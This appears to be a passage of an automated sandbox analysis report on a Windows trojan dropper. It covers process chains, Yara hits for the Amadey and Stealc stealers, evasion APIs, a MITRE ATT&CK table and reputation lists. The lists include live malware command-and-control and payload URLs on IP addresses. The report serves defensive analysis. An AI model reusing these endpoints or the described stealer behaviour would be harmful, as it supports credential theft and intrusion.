21_2_00DCEAA2

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00D82622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

21_2_00D82622

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

21_2_00D542DE

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008DA0F2 mov eax, dword ptr fs:[00000030h]	15_2_008DA0F2
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008D638B mov eax, dword ptr fs:[00000030h]	15_2_008D638B
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D74CE8 mov eax, dword ptr fs:[00000030h]	21_2_00D74CE8

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DB0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

21_2_00DB0B62

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D82622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00D82622
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D7083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00D7083F
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D709D5 SetUnhandledExceptionFilter,	21_2_00D709D5
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D70C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00D70C21

Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 76251a0626.exe PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 88b8632b35.exe PID: 1568, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

21_2_00DB1201

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Code function: 15_2_008A71C0 ShellExecuteA,Sleep,CreateThread,Sleep,

15_2_008A71C0

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DBB226 SendInput,keybd_event,

21_2_00DBB226

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DD22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

21_2_00DD22DA

Source: C:\Users\user\Desktop\pud8g3zixE.exe	Process created: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe "C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe "C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe "C:\Users\user~1\AppData\Local\Temp\1000029001\139d3265bb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe "C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

21_2_00DB0B62

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DB1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

21_2_00DB1663

Source: 139d3265bb.exe, 00000015.00000000.1486637966.0000000000E12000.00000002.00000001.01000000.0000000A.sdmp, 139d3265bb.exe.15.dr, random[1].exe0.15.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 139d3265bb.exe	Binary or memory string: Shell_TrayWnd
Source: svoutse.exe, svoutse.exe, 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: j?Program Manager
Source: 76251a0626.exe, 76251a0626.exe, 00000014.00000002.1545443522.0000000001214000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: GxProgram Manager

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Code function: 15_2_008BD243 cpuid

15_2_008BD243

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Code function: 15_2_008BCA4A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

15_2_008BCA4A

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Code function: 15_2_008A64F0 LookupAccountNameA,

15_2_008A64F0

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00D8B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

21_2_00D8B952

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

21_2_00D542DE

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 15.2.svoutse.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svoutse.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svoutse.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pud8g3zixE.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1285433147.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1321048201.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1245341924.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1308219786.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1267579083.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1404487341.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1280591363.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 76251a0626.exe PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 88b8632b35.exe PID: 1568, type: MEMORYSTR

Source: 139d3265bb.exe	Binary or memory string: WIN_81
Source: 139d3265bb.exe	Binary or memory string: WIN_XP
Source: random[1].exe0.15.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 139d3265bb.exe	Binary or memory string: WIN_XPe
Source: 139d3265bb.exe	Binary or memory string: WIN_VISTA
Source: 139d3265bb.exe	Binary or memory string: WIN_7
Source: 139d3265bb.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 76251a0626.exe PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 88b8632b35.exe PID: 1568, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DD1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		21_2_00DD1204
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DD1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		21_2_00DD1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Extra Window Memory Injection	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	2 Valid Accounts	12 Software Packing	NTDS	227 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	861 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	1 Extra Window Memory Injection	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	11 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	351 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pud8g3zixE.exe	79%	ReversingLabs	Win32.Trojan.Multiverze
pud8g3zixE.exe	75%	Virustotal		Browse
pud8g3zixE.exe	100%	Avira	TR/Crypt.TPM.Gen
pud8g3zixE.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	34%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	26%	ReversingLabs
C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	79%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	26%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	34%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	34%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
example.org	0%	Virustotal	Browse
chrome.cloudflare-dns.com	0%	Virustotal	Browse
prod.classify-client.prod.webservices.mozgcp.net	0%	Virustotal	Browse
services.addons.mozilla.org	0%	Virustotal	Browse
prod.balrog.prod.cloudops.mozgcp.net	0%	Virustotal	Browse
prod.detectportal.prod.cloudops.mozgcp.net	0%	Virustotal	Browse
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	0%	Virustotal	Browse
push.services.mozilla.com	0%	Virustotal	Browse
detectportal.firefox.com	0%	Virustotal	Browse
prod.ads.prod.webservices.mozgcp.net	0%	Virustotal	Browse
us-west1.prod.sumo.prod.webservices.mozgcp.net	0%	Virustotal	Browse
telemetry-incoming.r53-2.services.mozilla.com	0%	Virustotal	Browse
prod.content-signature-chains.prod.webservices.mozgcp.net	0%	Virustotal	Browse
contile.services.mozilla.com	0%	Virustotal	Browse
spocs.getpocket.com	0%	Virustotal	Browse
prod.remote-settings.prod.webservices.mozgcp.net	0%	Virustotal	Browse
ipv4only.arpa	0%	Virustotal	Browse
bzib.nelreports.net	0%	Virustotal	Browse
firefox.settings.services.mozilla.com	0%	Virustotal	Browse
content-signature-2.cdn.mozilla.net	0%	Virustotal	Browse
support.mozilla.org	0%	Virustotal	Browse
shavar.services.mozilla.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing	0%	URL Reputation	safe
http://185.215.113.100/e2b1563c6670f193.php	100%	URL Reputation	malware
http://mozilla.org/#/properties/proposedEnrollment	0%	Avira URL Cloud	safe
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	0%	Avira URL Cloud	safe
http://detectportal.firefox.com/	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/schemaVersion	0%	Avira URL Cloud	safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1678942	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value	0%	Avira URL Cloud	safe
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	0%	Avira URL Cloud	safe
http://www.mozilla.com0	0%	Avira URL Cloud	safe
http://detectportal.firefox.com/	0%	Virustotal		Browse
https://merino.services.mozilla.com/api/v1/suggest	0%	Avira URL Cloud	safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1678942	0%	Virustotal		Browse
http://mozilla.org/#/properties/originsDaysCutOff	0%	Avira URL Cloud	safe
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	0%	Virustotal		Browse
https://merino.services.mozilla.com/api/v1/suggest	0%	Virustotal		Browse
https://spocs.getpocket.com/spocs	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value	0%	Virustotal		Browse
https://screenshots.firefox.com	0%	Avira URL Cloud	safe
https://ads.stickyadstv.com/firefox-etp	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/schemaVersion	0%	Virustotal		Browse
http://mozilla.org/#/properties/originsDaysCutOff	0%	Virustotal		Browse
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	0%	Virustotal		Browse
https://identity.mozilla.com/ids/ecosystem_telemetryU	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/richSuggestionsFeatureGate	0%	Avira URL Cloud	safe
https://screenshots.firefox.com	0%	Virustotal		Browse
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/proposedEnrollment	0%	Virustotal		Browse
https://xhr.spec.whatwg.org/#sync-warning	0%	Avira URL Cloud	safe
https://spocs.getpocket.com/spocs	0%	Virustotal		Browse
http://mozilla.org/#/properties/branches	0%	Avira URL Cloud	safe
https://www.amazon.com/exec/obidos/external-search/	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/userFacingName	0%	Avira URL Cloud	safe
https://xhr.spec.whatwg.org/#sync-warning	0%	Virustotal		Browse
https://identity.mozilla.com/ids/ecosystem_telemetryU	0%	Virustotal		Browse
https://profiler.firefox.com/	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/richSuggestionsFeatureGate	0%	Virustotal		Browse
http://mozilla.org/#/properties/cbhStudyRow	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/branches	0%	Virustotal		Browse
https://ads.stickyadstv.com/firefox-etp	0%	Virustotal		Browse
https://github.com/mozilla-services/screenshots	0%	Avira URL Cloud	safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def	0%	Avira URL Cloud	safe
https://tracking-protection-issues.herokuapp.com/new	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/referenceBranch	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	0%	Avira URL Cloud	safe
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	0%	Virustotal		Browse
http://185.215.113.100/e2b1563c6670f193.phplS	100%	Avira URL Cloud	malware
http://31.41.244.10/	100%	Avira URL Cloud	phishing
http://mozilla.org/#/properties/extraParams	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/appId	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/outcomes/items	0%	Avira URL Cloud	safe
https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht	0%	Avira URL Cloud	safe
http://185.215.113.100/al	100%	Avira URL Cloud	malware
http://mozilla.org/#/properties/forceWaitHttpsRRaddonsSearchDetection.onSearchEngineModified	0%	Avira URL Cloud	safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/outcomes/items/properties/priorityhttp://mozilla.org/#/properties/br	0%	Avira URL Cloud	safe
https://ok.ru/	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.php7	100%	Avira URL Cloud	malware
https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc	0%	Avira URL Cloud	safe
http://exslt.org/dates-and-times	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature	0%	Avira URL Cloud	safe
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
http://31.41.244.10/Dem7kTu/index.php15e6	100%	Avira URL Cloud	phishing
https://www.bbc.co.uk/	0%	Avira URL Cloud	safe
https://addons.mozilla.org/firefox/addon/to-google-translate/	0%	Avira URL Cloud	safe
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	0%	Avira URL Cloud	safe
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152	0%	Avira URL Cloud	safe
https://bugzilla.mo	0%	Avira URL Cloud	safe
https://mitmdetection.services.mozilla.com/	0%	Avira URL Cloud	safe
https://spocs.getpocket.com/	0%	Avira URL Cloud	safe
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	0%	Avira URL Cloud	safe
https://www.iqiyi.com/	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/endDate	0%	Avira URL Cloud	safe
http://31.41.244.10/Dem7kTu/index.php15;	100%	Avira URL Cloud	phishing
https://monitor.firefox.com/user/breach-stats?includeResolved=true	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.phpH4	100%	Avira URL Cloud	malware
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	0%	Avira URL Cloud	safe
https://bugzilla.mozilla.org/show_bug.cgi?id=1170143	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/networkPredictoraddons-search-detection	0%	Avira URL Cloud	safe
https://account.bellmedia.c	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/enrollmentEndDate	0%	Avira URL Cloud	safe
https://login.microsoftonline.com	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839	0%	Avira URL Cloud	safe
https://www.zhihu.com/	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/outcomes	0%	Avira URL Cloud	safe
http://31.41.244.11/well/random.exe	100%	Avira URL Cloud	phishing
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored	0%	Avira URL Cloud	safe
https://identity.mozilla.com/apps/relay	0%	Avira URL Cloud	safe
http://31.41.244.10/Dem7kTu/index.php1	100%	Avira URL Cloud	phishing
https://mail.yahoo.co.jp/compose/?To=%s	0%	Avira URL Cloud	safe
http://185.215.113.100/en-GB	100%	Avira URL Cloud	malware
https://contile.services.mozilla.com/v1/tiles	0%	Avira URL Cloud	safe
https://www.amazon.co.uk/	0%	Avira URL Cloud	safe
http://31.41.244.10/Dem7kTu/index.php9	100%	Avira URL Cloud	phishing
https://monitor.firefox.com/user/preferences	0%	Avira URL Cloud	safe
https://screenshots.firefox.com/	0%	Avira URL Cloud	safe
http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad	0%	Avira URL Cloud	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	0%	Avira URL Cloud	safe
https://vk.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
example.org	93.184.215.14	true	false	0%, Virustotal, Browse	unknown
chrome.cloudflare-dns.com	172.64.41.3	true	false	0%, Virustotal, Browse	unknown
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	0%, Virustotal, Browse	unknown
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	0%, Virustotal, Browse	unknown
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	0%, Virustotal, Browse	unknown
services.addons.mozilla.org	52.222.236.48	true	false	0%, Virustotal, Browse	unknown
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	0%, Virustotal, Browse	unknown
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	0%, Virustotal, Browse	unknown
contile.services.mozilla.com	34.117.188.166	true	false	0%, Virustotal, Browse	unknown
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	0%, Virustotal, Browse	unknown
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	0%, Virustotal, Browse	unknown
